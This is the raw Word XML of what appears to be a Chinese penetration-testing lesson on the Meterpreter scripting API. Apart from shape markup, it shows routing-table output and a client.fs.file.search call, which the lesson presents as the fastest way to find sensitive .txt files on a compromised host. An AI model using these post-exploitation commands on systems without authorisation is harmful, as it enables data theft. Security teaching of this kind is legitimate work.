        <v:shape style="position:absolute;left:1950;top:1770;width:250;height:250" coordorigin="1950,1770" coordsize="250,250" path="m1975,1780l1975,1780,1975,1780,1975,1780,1975,1780,1975,1780,1975,1780,1975,1780,1975,1780,1975,1780,1975,1780,1975,1780,1975,1780,1975,1780,1975,1780,1975,1780,1975,1780,1976,1780,1976,1780,1976,1780,1976,1780,1976,1780,1976,1780,1977,1780,1977,1780,1977,1780,1977,1780,1977,1780,1978,1780,1978,1780,1978,1780,1979,1780,1979,1780,1980,1780,1980,1780,1981,1780,1981,1780,1982,1780,1982,1780,1983,1780,1983,1780,1984,1780,1985,1780,1986,1780,1986,1780,1987,1780,1988,1780,1989,1780,1990,1780,1991,1780,1992,1780,1993,1780,1994,1780,1995,1780,1996,1780,1997,1780,1999,1780,2000,1780,2001,1780,2003,1780,2004,1780,2006,1780,2007,1780,2009,1780,2011,1780,2012,1780,2014,1780,2016,1780,2018,1780,2020,1780,2022,1780,2024,1780,2026,1780,2028,1780,2030,1780,2033,1780,2035,1780,2038,1780,2040,1780,2043,1780,2045,1780,2048,1780,2051,1780,2054,1780,2056,1780,2059,1780,2063,1780,2066,1780,2069,1780,2072,1780,2075,1780,2079,1780,2082,1780,2086,1780,2090,1780,2093,1780,2097,1780,2101,1780,2105,1780,2109,1780,2113,1780,2117,1780,2122,1780,2126,1780,2131,1780,2135,1780,2140,1780,2145,1780,2150,1780,2154,1780,2160,1780,2165,1780,2170,1780,2175,1780,2181,1780,2186,1780,2192,1780,2197,1780,2203,1780,2209,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1780,2215,1781,2215,1781,2215,1781,2215,1781,2215,1781,2215,1781,2215,1782,2215,1782,2215,1782,2215,1782,2215,1783,2215,1783,2215,1783,2215,1784,2215,1784,2215,1784,2215,1785,2215,1785,2215,1786,2215,1786,2215,1787,2215,1788,2215,1788,2215,1789,2215,1790,2215,1790,2215,1791,2215,1792,2215,1793,2215,1794,2215,1795,2215,1796,2215,1797,2215,1798,2215,1799,2215,1800,2215,1801,2215,1802,2215,1804,2215,1805,2215,1806,2215,1808,2215,1809,2215,1811,2215,1813,2215,1814,2215,1816,2215,1818,2215,1820,2215,1821,2215,1823,2215,1825,2215,1827,2215,1830,2215,1832,2215,1834,2215,1836,2215,1839,2215,1841,2215,1844,2215,1846,2215,1849,2215,1852,2215,1855,2215,1857,2215,1860,2215,1863,2215,1866,2215,1870,2215,1873,2215,1876,2215,1880,2215,1883,2215,1887,2215,1890,2215,1894,2215,1898,2215,1902,2215,1906,2215,1910,2215,1914,2215,1918,2215,1922,2215,1927,2215,1931,2215,1936,2215,1941,2215,1945,2215,1950,2215,1955,2215,1960,2215,1965,2215,1971,2215,1976,2215,1981,2215,1987,2215,1993,2215,1998,2215,2004,2215,2010,2215,2016,2215,2022,2215,2029,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2215,2035,2214,2035,2214,2035,2214,2035,2214,2035,2214,2035,2214,2035,2213,2035,2213,2035,2213,2035,2213,2035,2212,2035,2212,2035,2212,2035,2211,2035,2211,2035,2210,2035,2210,2035,2210,2035,2209,2035,2208,2035,2208,2035,2207,2035,2207,2035,2206,2035,2205,2035,2205,2035,2204,2035,2203,2035,2202,2035,2201,2035,2200,2035,2199,2035,2198,2035,2197,2035,2196,2035,2195,2035,2194,2035,2193,2035,2191,2035,2190,2035,2189,2035,2187,2035,2186,2035,2184,2035,2183,2035,2181,2035,2179,2035,2178,2035,2176,2035,2174,2035,2172,2035,2170,2035,2168,2035,2166,2035,2164,2035,2162,2035,2160,2035,2157,2035,2155,2035,2153,2035,2150,2035,2147,2035,2145,2035,2142,2035,2139,2035,2137,2035,2134,2035,2131,2035,2128,2035,2124,2035,2121,2035,2118,2035,2115,2035,2111,2035,2108,2035,2104,2035,2101,2035,2097,2035,2093,2035,2089,2035,2085,2035,2081,2035,2077,2035,2073,2035,2068,2035,2064,2035,2059,2035,2055,2035,2050,2035,2045,2035,2041,2035,2036,2035,2031,2035,2025,2035,2020,2035,2015,2035,2010,2035,2004,2035,1998,2035,1993,2035,1987,2035,1981,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2035,1975,2034,1975,2034,1975,2034,1975,2034,1975,2034,1975,2034,1975,2033,1975,2033,1975,2033,1975,2033,1975,2032,1975,2032,1975,2032,1975,2031,1975,2031,1975,2031,1975,2030,1975,2030,1975,2029,1975,2029,1975,2028,1975,2027,1975,2027,1975,2026,1975,2025,1975,2025,1975,2024,1975,2023,1975,2022,1975,2021,1975,2020,1975,2019,1975,2018,1975,2017,1975,2016,1975,2015,1975,2014,1975,2012,1975,2011,1975,2010,1975,2008,1975,2007,1975,2005,1975,2004,1975,2002,1975,2001,1975,1999,1975,1997,1975,1995,1975,1993,1975,1991,1975,1989,1975,1987,1975,1985,1975,1983,1975,1981,1975,1979,1975,1976,1975,1974,1975,1971,1975,1969,1975,1966,1975,1963,1975,1960,1975,1958,1975,1955,1975,1952,1975,1948,1975,1945,1975,1942,1975,1939,1975,1935,1975,1932,1975,1928,1975,1925,1975,1921,1975,1917,1975,1913,1975,1909,1975,1905,1975,1901,1975,1897,1975,1893,1975,1888,1975,1884,1975,1879,1975,1874,1975,1870,1975,1865,1975,1860,1975,1855,1975,1850,1975,1844,1975,1839,1975,1834,1975,1828,1975,1822,1975,1817,1975,1811,1975,1805,1975,1799,1975,1793,1975,1786,1975,1780e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:102.500pt;margin-top:106.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2050,2130" coordsize="130,270">
        <v:shape style="position:absolute;left:2050;top:2130;width:130;height:270" coordorigin="2050,2130" coordsize="130,270" path="m2065,2155l2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2065,2155,2066,2155,2066,2155,2066,2155,2066,2155,2066,2155,2066,2155,2066,2155,2066,2155,2066,2155,2067,2155,2067,2155,2067,2155,2067,2155,2067,2155,2068,2155,2068,2155,2068,2155,2068,2155,2069,2155,2069,2155,2069,2155,2070,2155,2070,2155,2070,2155,2071,2155,2071,2155,2072,2155,2072,2155,2072,2155,2073,2155,2073,2155,2074,2155,2074,2155,2075,2155,2076,2155,2076,2155,2077,2155,2078,2155,2078,2155,2079,2155,2080,2155,2080,2155,2081,2155,2082,2155,2083,2155,2084,2155,2085,2155,2086,2155,2086,2155,2087,2155,2088,2155,2089,2155,2091,2155,2092,2155,2093,2155,2094,2155,2095,2155,2096,2155,2098,2155,2099,2155,2100,2155,2102,2155,2103,2155,2104,2155,2106,2155,2107,2155,2109,2155,2110,2155,2112,2155,2114,2155,2115,2155,2117,2155,2119,2155,2121,2155,2122,2155,2124,2155,2126,2155,2128,2155,2130,2155,2132,2155,2134,2155,2136,2155,2138,2155,2141,2155,2143,2155,2145,2155,2148,2155,2150,2155,2152,2155,2155,2155,2157,2155,2160,2155,2162,2155,2165,2155,2168,2155,2171,2155,2173,2155,2176,2155,2179,2155,2182,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2156,2185,2156,2185,2156,2185,2156,2185,2156,2185,2156,2185,2156,2185,2157,2185,2157,2185,2157,2185,2157,2185,2158,2185,2158,2185,2158,2185,2159,2185,2159,2185,2160,2185,2160,2185,2161,2185,2161,2185,2162,2185,2162,2185,2163,2185,2163,2185,2164,2185,2165,2185,2166,2185,2166,2185,2167,2185,2168,2185,2169,2185,2170,2185,2171,2185,2172,2185,2173,2185,2174,2185,2175,2185,2176,2185,2178,2185,2179,2185,2180,2185,2182,2185,2183,2185,2185,2185,2186,2185,2188,2185,2189,2185,2191,2185,2193,2185,2195,2185,2197,2185,2199,2185,2201,2185,2203,2185,2205,2185,2207,2185,2209,2185,2212,2185,2214,2185,2216,2185,2219,2185,2222,2185,2224,2185,2227,2185,2230,2185,2233,2185,2236,2185,2239,2185,2242,2185,2245,2185,2248,2185,2251,2185,2255,2185,2258,2185,2262,2185,2265,2185,2269,2185,2273,2185,2277,2185,2281,2185,2285,2185,2289,2185,2293,2185,2298,2185,2302,2185,2306,2185,2311,2185,2316,2185,2321,2185,2325,2185,2330,2185,2335,2185,2341,2185,2346,2185,2351,2185,2357,2185,2362,2185,2368,2185,2374,2185,2379,2185,2385,2185,2391,2185,2398,2185,2404,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2184,2410,2184,2410,2184,2410,2184,2410,2184,2410,2184,2410,2184,2410,2184,2410,2183,2410,2183,2410,2183,2410,2183,2410,2183,2410,2182,2410,2182,2410,2182,2410,2181,2410,2181,2410,2181,2410,2181,2410,2180,2410,2180,2410,2179,2410,2179,2410,2179,2410,2178,2410,2178,2410,2177,2410,2177,2410,2176,2410,2176,2410,2175,2410,2174,2410,2174,2410,2173,2410,2173,2410,2172,2410,2171,2410,2170,2410,2170,2410,2169,2410,2168,2410,2167,2410,2166,2410,2166,2410,2165,2410,2164,2410,2163,2410,2162,2410,2161,2410,2160,2410,2159,2410,2157,2410,2156,2410,2155,2410,2154,2410,2153,2410,2151,2410,2150,2410,2149,2410,2147,2410,2146,2410,2144,2410,2143,2410,2141,2410,2140,2410,2138,2410,2137,2410,2135,2410,2133,2410,2131,2410,2130,2410,2128,2410,2126,2410,2124,2410,2122,2410,2120,2410,2118,2410,2116,2410,2114,2410,2112,2410,2109,2410,2107,2410,2105,2410,2103,2410,2100,2410,2098,2410,2095,2410,2093,2410,2090,2410,2088,2410,2085,2410,2082,2410,2080,2410,2077,2410,2074,2410,2071,2410,2068,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2410,2065,2409,2065,2409,2065,2409,2065,2409,2065,2409,2065,2409,2065,2408,2065,2408,2065,2408,2065,2408,2065,2407,2065,2407,2065,2407,2065,2406,2065,2406,2065,2405,2065,2405,2065,2404,2065,2404,2065,2403,2065,2403,2065,2402,2065,2401,2065,2401,2065,2400,2065,2399,2065,2398,2065,2397,2065,2396,2065,2395,2065,2394,2065,2393,2065,2392,2065,2391,2065,2390,2065,2389,2065,2388,2065,2386,2065,2385,2065,2384,2065,2382,2065,2381,2065,2379,2065,2378,2065,2376,2065,2374,2065,2372,2065,2371,2065,2369,2065,2367,2065,2365,2065,2363,2065,2360,2065,2358,2065,2356,2065,2354,2065,2351,2065,2349,2065,2346,2065,2344,2065,2341,2065,2338,2065,2336,2065,2333,2065,2330,2065,2327,2065,2324,2065,2320,2065,2317,2065,2314,2065,2311,2065,2307,2065,2303,2065,2300,2065,2296,2065,2292,2065,2288,2065,2284,2065,2280,2065,2276,2065,2272,2065,2268,2065,2263,2065,2259,2065,2254,2065,2250,2065,2245,2065,2240,2065,2235,2065,2230,2065,2225,2065,2219,2065,2214,2065,2209,2065,2203,2065,2198,2065,2192,2065,2186,2065,2180,2065,2174,2065,2168,2065,2161,2065,2155e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:108.500pt;margin-top:106.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2170,2130" coordsize="130,270">
        <v:shape style="position:absolute;left:2170;top:2130;width:130;height:270" coordorigin="2170,2130" coordsize="130,270" path="m2185,2155l2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2185,2155,2186,2155,2186,2155,2186,2155,2186,2155,2186,2155,2186,2155,2186,2155,2186,2155,2186,2155,2187,2155,2187,2155,2187,2155,2187,2155,2187,2155,2187,2155,2188,2155,2188,2155,2188,2155,2188,2155,2189,2155,2189,2155,2189,2155,2190,2155,2190,2155,2190,2155,2191,2155,2191,2155,2192,2155,2192,2155,2192,2155,2193,2155,2193,2155,2194,2155,2195,2155,2195,2155,2196,2155,2196,2155,2197,2155,2198,2155,2198,2155,2199,2155,2200,2155,2200,2155,2201,2155,2202,2155,2203,2155,2204,2155,2205,2155,2206,2155,2207,2155,2208,2155,2209,2155,2210,2155,2211,2155,2212,2155,2213,2155,2214,2155,2215,2155,2216,2155,2218,2155,2219,2155,2220,2155,2222,2155,2223,2155,2224,2155,2226,2155,2227,2155,2229,2155,2230,2155,2232,2155,2234,2155,2235,2155,2237,2155,2239,2155,2241,2155,2242,2155,2244,2155,2246,2155,2248,2155,2250,2155,2252,2155,2254,2155,2256,2155,2259,2155,2261,2155,2263,2155,2265,2155,2268,2155,2270,2155,2272,2155,2275,2155,2277,2155,2280,2155,2283,2155,2285,2155,2288,2155,2291,2155,2293,2155,2296,2155,2299,2155,2302,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2155,2305,2156,2305,2156,2305,2156,2305,2156,2305,2156,2305,2156,2305,2156,2305,2157,2305,2157,2305,2157,2305,2157,2305,2158,2305,2158,2305,2158,2305,2159,2305,2159,2305,2160,2305,2160,2305,2161,2305,2161,2305,2162,2305,2162,2305,2163,2305,2163,2305,2164,2305,2165,2305,2166,2305,2166,2305,2167,2305,2168,2305,2169,2305,2170,2305,2171,2305,2172,2305,2173,2305,2174,2305,2175,2305,2176,2305,2178,2305,2179,2305,2180,2305,2182,2305,2183,2305,2185,2305,2186,2305,2188,2305,2189,2305,2191,2305,2193,2305,2195,2305,2197,2305,2199,2305,2201,2305,2203,2305,2205,2305,2207,2305,2209,2305,2212,2305,2214,2305,2216,2305,2219,2305,2222,2305,2224,2305,2227,2305,2230,2305,2233,2305,2236,2305,2239,2305,2242,2305,2245,2305,2248,2305,2251,2305,2255,2305,2258,2305,2262,2305,2265,2305,2269,2305,2273,2305,2277,2305,2281,2305,2285,2305,2289,2305,2293,2305,2298,2305,2302,2305,2306,2305,2311,2305,2316,2305,2321,2305,2325,2305,2330,2305,2335,2305,2341,2305,2346,2305,2351,2305,2357,2305,2362,2305,2368,2305,2374,2305,2379,2305,2385,2305,2391,2305,2398,2305,2404,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2305,2410,2304,2410,2304,2410,2304,2410,2304,2410,2304,2410,2304,2410,2304,2410,2303,2410,2303,2410,2303,2410,2303,2410,2303,2410,2302,2410,2302,2410,2302,2410,2302,2410,2301,2410,2301,2410,2301,2410,2300,2410,2300,2410,2299,2410,2299,2410,2299,2410,2298,2410,2298,2410,2297,2410,2297,2410,2296,2410,2296,2410,2295,2410,2295,2410,2294,2410,2293,2410,2293,2410,2292,2410,2291,2410,2291,2410,2290,2410,2289,2410,2288,2410,2287,2410,2286,2410,2286,2410,2285,2410,2284,2410,2283,2410,2282,2410,2281,2410,2280,2410,2279,2410,2277,2410,2276,2410,2275,2410,2274,2410,2273,2410,2271,2410,2270,2410,2269,2410,2267,2410,2266,2410,2264,2410,2263,2410,2261,2410,2260,2410,2258,2410,2257,2410,2255,2410,2253,2410,2251,2410,2250,2410,2248,2410,2246,2410,2244,2410,2242,2410,2240,2410,2238,2410,2236,2410,2234,2410,2232,2410,2230,2410,2227,2410,2225,2410,2223,2410,2220,2410,2218,2410,2215,2410,2213,2410,2210,2410,2208,2410,2205,2410,2202,2410,2200,2410,2197,2410,2194,2410,2191,2410,2188,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2410,2185,2409,2185,2409,2185,2409,2185,2409,2185,2409,2185,2409,2185,2408,2185,2408,2185,2408,2185,2408,2185,2407,2185,2407,2185,2407,2185,2406,2185,2406,2185,2405,2185,2405,2185,2404,2185,2404,2185,2403,2185,2403,2185,2402,2185,2401,2185,2401,2185,2400,2185,2399,2185,2398,2185,2397,2185,2396,2185,2395,2185,2394,2185,2393,2185,2392,2185,2391,2185,2390,2185,2389,2185,2388,2185,2386,2185,2385,2185,2384,2185,2382,2185,2381,2185,2379,2185,2378,2185,2376,2185,2374,2185,2372,2185,2371,2185,2369,2185,2367,2185,2365,2185,2363,2185,2360,2185,2358,2185,2356,2185,2354,2185,2351,2185,2349,2185,2346,2185,2344,2185,2341,2185,2338,2185,2336,2185,2333,2185,2330,2185,2327,2185,2324,2185,2320,2185,2317,2185,2314,2185,2311,2185,2307,2185,2303,2185,2300,2185,2296,2185,2292,2185,2288,2185,2284,2185,2280,2185,2276,2185,2272,2185,2268,2185,2263,2185,2259,2185,2254,2185,2250,2185,2245,2185,2240,2185,2235,2185,2230,2185,2225,2185,2219,2185,2214,2185,2209,2185,2203,2185,2198,2185,2192,2185,2186,2185,2180,2185,2174,2185,2168,2185,2161,2185,2155e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:390.600pt;width:467.400pt;height:139.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId28" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:632.400pt;width:467.400pt;height:156.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId2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arp_table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interface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59800"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"65539"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config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routes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23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#&lt;Rex::Post::Meterpreter::Extensions::Stdapi::Net::Route:0x000055a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ee789be58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@subnet="0.0.0.0",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@netmask="0.0.0.0",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@gateway="192.168.1.1",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@interface="65539",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@metric=10&gt;,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#&lt;Rex::Post::Meterpreter::Extensions::St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dapi::Net::Route:0x000055aee789a7b0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@subnet="127.0.0.0",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@netmask="255.0.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0.0",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@gateway="127.0.0.1",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@interface="1",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@metric=1&gt;,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#&lt;Rex::Post::Mete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rpreter::Extensions::Stdapi::Net::Route:0x000055aee78993b0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@subnet="192.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="4" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1324" w:firstLine="0"/>
      </w:pP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68.1.0",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@netmask="255.255.255.0",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@gateway="192.168.1.119",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@interface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="65539",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@metric=10&gt;,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#&lt;Rex::Post::Meterpreter::Extensions::Stdapi::Ne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t::Route:0x000055aee786fec0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@subnet="192.168.1.119",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@netmask="255.255.25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5.255",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@gateway="127.0.0.1",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@interface="1",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@metric=10&gt;,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#&lt;Rex::Post::M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eterpreter::Extensions::Stdapi::Net::Route:0x000055aee786e9d0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-52"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@subnet="19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2.168.1.255",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@netmask="255.255.255.255",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@gateway="192.168.1.119",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@inte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rface="65539",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@metric=10&gt;,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#&lt;Rex::Post::Meterpreter::Extensions::Stdap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i::Net::Route:0x000055aee786d698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@subnet="224.0.0.0",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@netmask="240.0.0.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0",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@gateway="192.168.1.119",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@interface="65539",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@metric=10&gt;,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#&lt;Rex::Pos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t::Meterpreter::Extensions::Stdapi::Net::Route:0x000055aee785be98</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@subnet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="255.255.255.255",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@netmask="255.255.255.255",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@gateway="192.168.1.119",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@interface="65539",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@metric=1&gt;]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79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实战中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的敏感文件操作，也是目前最稳定，速度最快的方式：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client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fs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file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search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"C:\\"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"*.txt"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更多</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的敏感文件操作，后续补充。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163.199pt;width:7.200pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId3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更多相关的api操作在未来的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>课时中介绍。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